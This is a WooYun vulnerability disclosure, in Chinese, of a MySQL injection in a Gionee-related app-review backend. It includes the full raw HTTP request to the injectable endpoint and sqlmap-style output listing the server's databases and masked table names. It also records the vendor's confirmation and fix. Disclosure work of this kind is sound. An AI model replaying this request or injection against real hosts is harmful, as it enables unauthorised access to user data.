当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178525

漏洞标题:金立手机某处MySQL注入(影响150W用户信息)

相关厂商:gionee.com

漏洞作者: 路人甲

提交时间:2016-02-25 12:35

修复时间:2016-03-03 17:44

公开时间:2016-03-03 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-25: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-03: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

金立手机某处MySQL注入(影响150W用户信息)

详细说明:

POST /dvp_app_shoufa_edit.php?userid=&token= HTTP/1.1
Host: ht.myaora.net:82
Content-Length: 464
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ht.myaora.net:82
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5971&package=com.bccv.meitu&act=business
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_026fc5a6a4f9402e52f6011dd6a28899=1456117728; PHPSESSID=prbh2flgmhv9e73ged9qa6goo1
hidtype=2&id=5971&softid=0&package=com.bccv.meitu&dvp_id=27596&name=%E5%A3%AB%E5%A4%A7%E5%A4%AB%E9%9A%8F%E9%A3%8E%E5%80%92+&app_id=0&start_time=&sel_state=4&act=business&Submit=%E6%8F%90%E4%BA%A4%E7%BB%93%E6%9E%9C&refuse=%E8%AF%B7%E4%B8%8A%E4%BC%A0%E5%85%AC%E5%8F%B8%E5%90%8D%E8%AF%81%E7%85%A7%EF%BC%8C%E8%AF%B7%E4%BF%AE%E6%94%B9%E5%85%AC%E5%8F%B8%E5%90%8D%E7%A7%B0%EF%BC%8C%E8%AF%B7%E8%AF%A6%E7%BB%86%E5%86%99%E6%B8%85%E5%BA%94%E7%94%A8%E8%AF%B4%E6%98%8E%E3%80%82


id存在注入

1.png


available databases [13]:
[*] #mysql50#lost+found
[*] abc
[*] aorausermanagerdb
[*] att
[*] att_2
[*] comment
[*] dw_market_king
[*] information_schema
[*] market_king
[*] mysql
[*] pad_market
[*] performance_schema
[*] test


2.png


3.png


mask 区域
*****arket_*****
*****tab*****
*****---------*****
*****pp_VS *****
***** *****
*****T *****
*****FTTHUMB *****
***** *****
***** *****
***** *****
***** *****
*****re_list *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****fo *****
*****fo_2016 *****
*****fo_2016_0*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ft *****
***** *****
***** *****
***** *****
*****mmend *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****k *****
*****alog *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****serinfo_2*****
*****special *****
*****ore_histo*****
*****og *****
***** *****
*****opy *****
*****core *****
*****score *****
***** *****
*****rd2016 *****
*****rd2016020*****
***** *****
*****e_history*****
***** *****
*****e *****
***** *****
*****_0201 *****
*****_0202 *****
*****_0203 *****
*****_0204 *****
*****_0205 *****
*****_0206 *****
*****_0207 *****
*****_0208 *****
*****_0209 *****
*****_0210 *****
*****_0211 *****
*****_0212 *****
*****_0213 *****
*****_0214 *****
*****_0215 *****
*****k *****
***** *****
***** *****
*****_history *****
*****oad *****
***** *****
***** *****
*****00 *****
*****00 *****
*****ore_histo*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****talog *****
*****atus *****
***** *****
***** *****
*****y *****
*****y_dates *****
*****siness *****
***** *****
*****_ver *****
***** *****
*****l *****
***** *****
*****g *****
*****e *****
***** *****
***** *****
***** *****
***** *****
*****hot *****
***** *****
*****disabledd*****
*****noapk *****
*****ize *****
***** *****
*****tt *****
***** *****
*****_20160201*****
***** *****
*****aw *****
***** *****
*****sk *****
***** *****
***** *****
***** *****
***** *****
*****g *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****le *****
*****ule *****
***** *****
***** *****
***** *****
***** *****
*****_data *****
***** *****
***** *****
***** *****
*****d *****
***** *****
***** *****
***** *****
*****nt *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****screensho*****
*****ore *****
*****eyword *****
***** *****
***** *****
***** *****
*****al *****
*****ge_consol*****
*****ge_online*****
*****ge_specia*****
*****d_input *****
***** *****
*****ta *****
*****story *****
*****age *****
*****re *****
***** *****
*****unt *****
*****load_list*****
*****r *****
*****_setting *****
*****in *****
***** *****
*****ore *****
*****e *****
*****on *****
*****on_conten*****
***** *****
***** *****
*****ner *****
*****k *****
*****e *****
*****t *****
*****t_v4 *****
*****atics *****
*****_adapter *****
***** *****
*****k_input *****
*****ut *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****crement *****
***** *****
***** *****
***** *****
*****n_soft *****
*****idate *****
***** *****
*****d *****
***** *****
***** *****
***** *****
***** *****
*****db *****
***** *****
***** *****
*****r *****
***** *****
***** *****
*****_copy *****
***** *****
***** *****
***** *****
***** *****
*****as *****
***** *****
***** *****
*****ddres *****
***** *****
*****_account *****
*****illegal *****
*****list *****
*****list_upda*****
*****d *****
***** *****
***** *****
*****ord *****
*****ing *****
***** *****
***** *****
***** *****
*****r *****
***** *****
***** *****
*****k *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****tegory *****
***** *****
***** *****
***** *****
***** *****
*****s *****
***** *****
***** *****
*****s *****
***** *****
***** *****
***** *****
*****screensho*****
*****ad_rank *****
***** *****
***** *****
*****_content *****
***** *****
*****_task *****
***** *****
***** *****
*****_ad *****
***** *****
*****ent *****
*****s *****
*****ts *****
***** *****
***** *****
*****_ad *****
***** *****
***** *****
*****ontent *****
*****ot_data *****
*****henhe *****
*****emp *****
*****opic *****
*****ulan *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
*****ire *****
*****ire_answe*****
*****ire_detai*****
*****ire_exams*****
*****ire_histo*****
***** *****
*****e *****
***** *****
***** *****
*****n *****
***** *****
*****tent *****
***** *****
*****ter_keywo*****
***** *****
***** *****
*****_score *****
*****tall *****
*****el *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****te *****
***** *****
*****0 *****
*****ck *****
*****idu_new *****
*****itun *****
*****ndoujia *****
*****ndoujia_a*****
*****ngyongbao*****
*****ngyongbao*****
*****uxidating*****
*****imeiyingy*****
***** *****
***** *****
***** *****
***** *****
*****g *****
***** *****
***** *****
***** *****
***** *****
*****list *****
*****pe *****
***** *****
*****ee_score *****
*****ore *****
***** *****
***** *****
*****e *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****_catalog *****
*****word *****
*****k *****
*****cial *****
*****t *****
*****ght *****
*****ord *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ecord *****
*****unt *****
*****---------*****


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-02-29 15:09

厂商回复:

谢谢,已经告知相关公司同事 。谢谢

最新状态:

2016-03-03:相关同事已经修复。谢谢


漏洞评价:

评价